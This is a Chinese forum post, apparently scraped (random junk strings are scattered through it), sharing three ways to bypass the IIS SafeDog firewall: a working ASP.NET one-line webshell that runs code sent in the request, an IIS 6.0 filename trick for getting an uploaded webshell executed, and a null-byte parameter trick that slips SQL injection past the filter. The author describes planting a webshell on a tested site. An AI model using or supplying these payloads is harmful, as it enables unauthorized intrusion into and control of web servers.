1、绕过IIS安全狗的一句话。2 [ g3 D7 X! Z! S& b) {
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。
" j% W9 p) G A: B4 @* _<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。6 B6 j9 r' r) U. M4 Q
1 L' [+ E1 u& l t- x2、IIS6.0解析漏洞遇到安全狗。3 l t# q1 d+ I' d# o0 H
文件名为
F- z* }" w- o6 u7 ?http://www.xxxxx.com/sh3llc0de.asp;1.jpg
- M; @, {- ?7 m6 f1 T3 f; A# s. X0 b' f% k
这样的会被IIS安全狗果断屏蔽。
: H, @8 i! e o' e改成如下名称,IIS6一样会解析:
5 d4 J" a$ ^, ?3 M8 x3 w* lwww.xxxxx.com/;1.asp;1.jpg
9 y/ J; R3 q" I# x0 T' E
' Q+ S% G y" h3、安全狗的注入绕过。
( Q: ^0 v9 N' O5 i: n8 G常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。' y8 D3 |# ]) y7 j+ Z0 q2 {
但如果:
1 t3 s$ I6 y) }& G t; Gr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
3 A# K6 y$ q9 \/ M: Q ?就可以成功绕过了。
. P: h- {) s: z8 e0 _2 u+ W6 q9 s8 H& t
; h* W" @7 x+ | |